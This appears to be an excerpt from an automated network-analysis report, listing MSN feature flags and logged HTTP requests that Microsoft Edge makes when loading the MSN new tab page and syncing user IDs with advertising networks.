msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,ads-cfv4,1s-pnpfedloccf,pnpwxexpire360,bing_v2_scope,prg-1sw-sacfx2tc,prg-1sw-sa-capconf3t4,prg-1sw-sa-sp7-tcc,prg-1sw-rpdlaunch-5,prg-fin-cleftra,routefinanceprod,routergraphprod,prg-adspeek,prg-1sw-header-event,prg-pr2-widget-tab,f-rel-all,1s-fcrypt,1s-ntf1-pacerscale1,1s-ntf1-pacercand,1s-wpo-dmsdpr2,1s-wpo-pr2-dmsd,prg-1sw-dmpren,prg-1sw-sdcdp2,1s-ntf2-evlcfc,1s-ntf2-bknlc,1s-ntf2-iptlc,1s-pr2-evlc,1s-pr2-evlcbb,1s-pr2-evlch,1s-pr2-evlcn,1s-pr2-evlcrp,1s-pr2-evlct,1s-prg2-lifecycle,1s-wpo-pr2-ncard,1s-wpo-pr2-pnpfilter,1s-wpo-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_c,prg-cgp2-hott2,1s-cg-p2hot3,prg-1sw-dailypop,prg-1sw-trigdw,prg-pr2-trends-t1,1s-p2-lsawidget-c,1s-wpo-pr1-r1infpctl,cptest-msn-muid-c,1s-notifmapping,1s-shp-rc-te-combo1,1s-shp-rc-t2-ctr1204,1s-shp-rc-t3-nol2score,1s-shp-rc-ta-uetv2c,1s-shp-rc-te-crcfa2,1s-shp-rc-t-t2iv1,1s-shp-rc-tt-t2iv1,prg-sh-frnrc,prg-wx-dhgrd,prg-sh-dealsdaypdp,prg-sh-rmitmlnk-c,nopinglancecardit,prg-cg-ingames-xn-ads,prg-cg-in-gm-xn-ads,prg-1s-workid,1s-mxr-ntppage-c,1s-mxr-winfeed,1s-temp-wid-t,prg-1s-twid,ads-nopostsq-t,ads-nopostsq,1s-uasdisf-t,ads-usepme,ads-anjson-migt,sh-bdvid,prg-sh-bd-video,prg-pr2-evt-wkndc,prg-1sw-mtr-en,prg-1sw-artf1,prg-1sw-artrcnr,ads-nooutbrain,release-outlook-app,ads-prcrid-bi,ads-fbk-gserver,cg-ab-testing-c,1s-ntf1-tvid-ctr,prg-1sw-reclaim2,prg-1sw-reclaim,1s-p2-bg-appanon,ads-bcn-cndomain,1s-blis-nocache,cg-int-ad-pod-int,msph-crossmarketcn,1s-ntp-tredisc,clarity-ios-c,msph-applbug,prg-pr2-lifecycleba,1s-pr2-evlcbackingapp,prg-pw-t-no-ad-css,prg-1sw-wxnhcolk,prg-1sw-sa-dnec,prg-cg-pub-entry,prg-1sw-crypinf,prg-cg-pwa-lock-sl,prg-wx-ofor,prg-1sw-cryptren,wid-1s-automg-cmp-t,1s-wid-automig-t,wid-1s-automig-t,1s-ntf1-dynprevc,msph-adsrevpd,1s-sports-newdship,prg-netfirstwhp,prg-cg-cfzhcnfx,prg-cg-lstfix,prg-sp-vid-overlay,prg-1sw-agfspf1,cs-ddos-dm,prg-1sw-tbrfltr,prg-pw-t-cct-migrate,1s-cntravelerv2,1s-cntravelercookiev2,1s-wpo-lock-mvp-rev,1s-wpo-lock-mvp1-rev,prg-1sw-aitt-dt,1s-ntf2-tvid-int-ctr,prg-gc-pickwinner,prg-1sw-cgl1qr,prg-fin-rmar,prg-ad-chtag,msphxap-offbatch4,prg-1sw-wxfrcvd,prg-shipwidoff,1s-wpo-widgets,prg-widgets-manager,prg-widgets-region,prg-pr2-delayheadert2,prg-pr2-delaybanner,prg-pr2-delayheader,prg-pr2-stalecontent-dt,prg-pr2-stalecontent,prg-1sw-wxomghd,cprg-c-bl-nwtab,prg-pr2-uxmitipreimg,d5j7a890,1s-p2-ig
    Source: global trafficHTTP traffic detected: GET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.mediago.ioConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=cae0bcac-0788-4314-8d6d-ef1f6cde9e84&ii=1&c=2556969255498558843&bid=af84565f-f8a6-4f2f-a974-1cccfb0c3669&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: trace.popin.ccConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 150sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid?entity=483&code=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=1dd19eb1-735b-470f-9209-d9bb436269a4&ii=1&c=7645241228381444372&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
    Source: global trafficHTTP traffic detected: GET /notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
